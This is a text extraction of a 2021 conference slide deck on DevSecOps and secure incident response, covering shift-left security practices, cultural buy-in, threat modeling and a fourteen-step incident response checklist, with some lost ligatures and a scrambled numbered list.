DevSecOps and Secure Incident Response

A presentation at Pulumi Cloud Engineering Summit in October 2021 in by Quintessence Anx

Slide 1

Slide 1

DevSecOps and Secure Incident Response @QuintessenceAnx Developer Advocate @ PagerDuty

Slide 2

Slide 2

DevSecOps and Secure Incident Response @QuintessenceAnx Developer Advocate @ PagerDuty

Slide 3

Slide 3

Don’t panic @QuintessenceAnx

Slide 4

Slide 4

The Now @QuintessenceAnx

Slide 5

Slide 5

@QuintessenceAnx

Slide 6

Slide 6

Software Development Life Cycle @QuintessenceAnx

Slide 7

Slide 7

Vault over “The Wall” for Security Review @QuintessenceAnx

Slide 8

Slide 8

Software Development Life Cycle Security @QuintessenceAnx

Slide 9

Slide 9

@QuintessenceAnx

Slide 10

Slide 10

🤔 @QuintessenceAnx

Slide 11

Slide 11

DevSecOps @QuintessenceAnx

Slide 12

Slide 12

What is DevSecOps? @QuintessenceAnx

Slide 13

Slide 13

DevSecOps stands for development, security, and operations. DevSecOps seeks to integrate security across the SDLC and streamline the work ows between dev, sec, and ops. fl @QuintessenceAnx

Slide 14

Slide 14

What DevSecOps is not @QuintessenceAnx

Slide 15

Slide 15

DevSecOps is not replacing security with dev and/or ops, or expecting dev and/or ops to become security specialists, or expecting security to become devs and/or ops. @QuintessenceAnx

Slide 16

Slide 16

Phew. @QuintessenceAnx

Slide 17

Slide 17

@QuintessenceAnx

Slide 18

Slide 18

How? @QuintessenceAnx

Slide 19

Slide 19

The Secure SDLC + Shifting Left @QuintessenceAnx

Slide 20

Slide 20

@QuintessenceAnx

Slide 21

Slide 21

@QuintessenceAnx

Slide 22

Slide 22

@QuintessenceAnx

Slide 23

Slide 23

SecOps Activities • Secure architecture / design • Threat modeling • Testing, e.g. SAST and DAST • Scanning images and dependencies • Fuzzing • And more! @QuintessenceAnx

Slide 24

Slide 24

Shift Left @QuintessenceAnx

Slide 25

Slide 25

@QuintessenceAnx

Slide 26

Slide 26

How? @QuintessenceAnx

Slide 27

Slide 27

Cultural Support @QuintessenceAnx

Slide 28

Slide 28

Humans. @QuintessenceAnx

Slide 29

Slide 29

Sharp end: High Risk Low Power Blunt end: Low Risk High Power @QuintessenceAnx

Slide 30

Slide 30

Exec Buy-in @QuintessenceAnx

Slide 31

Slide 31

Never trick staff, ever. @QuintessenceAnx

Slide 32

Slide 32

Training @QuintessenceAnx

Slide 33

Slide 33

Full Service Ownership @QuintessenceAnx

Slide 34

Slide 34

Capture the Flag @QuintessenceAnx

Slide 35

Slide 35

Threat Modeling @QuintessenceAnx

Slide 36

Slide 36

🚨 @QuintessenceAnx

Slide 37

Slide 37

Secure Incident Response @QuintessenceAnx

Slide 38

Slide 38

  1. Stop the attack in progress. 2. Cut o the attack vector.
  2. Apply additional mitigations, make changes to monitoring, etc.
  3. Assemble the response team. 10.Forensic analysis of compromised systems.
  4. Isolate a ected instances. 11.Internal communication.
  5. Identify timeline of attack. 12.Involve law enforcement.
  6. Identify compromised data. 13.Reach out to external parties that may have been used as vector for attack.
  7. Assess risk to other systems. 8. Assess risk of re-attack. 14.External communication. ff ff @QuintessenceAnx

Slide 39

Slide 39

Stop the attack in progress @QuintessenceAnx

Slide 40

Slide 40

Cut off the attack vector @QuintessenceAnx

Slide 41

Slide 41

Assemble the response team @QuintessenceAnx

Slide 42

Slide 42

Isolate the affected instances @QuintessenceAnx

Slide 43

Slide 43

Identify timeline of the attack @QuintessenceAnx

Slide 44

Slide 44

Identify compromised data @QuintessenceAnx

Slide 45

Slide 45

Assess risk to other systems @QuintessenceAnx

Slide 46

Slide 46

Assess risk of re-attack @QuintessenceAnx

Slide 47

Slide 47

Apply additional mitigations, additions to monitoring, etc. @QuintessenceAnx

Slide 48

Slide 48

Forensic analysis of compromised systems @QuintessenceAnx

Slide 49

Slide 49

Internal communication @QuintessenceAnx

Slide 50

Slide 50

Involve law enforcement @QuintessenceAnx

Slide 51

Slide 51

Reach out to external parties that may have been used as attack vectors @QuintessenceAnx

Slide 52

Slide 52

External communication @QuintessenceAnx

Slide 53

Slide 53

  1. Stop the attack in progress. 2. Cut o the attack vector.
  2. Apply additional mitigations, make changes to monitoring, etc.
  3. Assemble the response team. 10.Forensic analysis of compromised systems.
  4. Isolate a ected instances. 11.Internal communication.
  5. Identify timeline of attack. 12.Involve law enforcement.
  6. Identify compromised data. 13.Reach out to external parties that may have been used as vector for attack.
  7. Assess risk to other systems. 8. Assess risk of re-attack. 14.External communication. ff ff @QuintessenceAnx

Slide 54

Slide 54

Resources & References noti.st/quintessence @QuintessenceAnx

Slide 55

Slide 55

Questions? Quintessence Anx Developer Advocate noti.st/quintessence @QuintessenceAnx

Slide 56

Slide 56

Brand Colors • PagerDuty Green Hex #06ac38 • Dark Green Hex #005a24 • Clay Hex #94b2a5 • Orange Hex #fa640a • Peach Hex # c5b2 • Yellow Hex # e664 • Dark Blue Hex #00607f ff ff @QuintessenceAnx